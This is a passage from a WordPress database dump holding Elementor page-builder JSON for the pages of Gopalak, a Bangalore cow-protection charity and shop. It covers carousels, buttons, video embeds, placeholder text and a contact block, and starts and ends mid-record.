"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10383,1730,'_elementor_page_assets','a:0:{}'),(10385,1731,'_elementor_edit_mode','builder'),(10386,1731,'_elementor_template_type','wp-page'),(10387,1731,'_elementor_version','3.7.8'),(10388,1731,'_wp_page_template','elementor_canvas'),(10389,1731,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"},{\"id\":1688,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-karolina-grabowska-4219654-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1692,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-ave-calvar-martinez-3637852-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b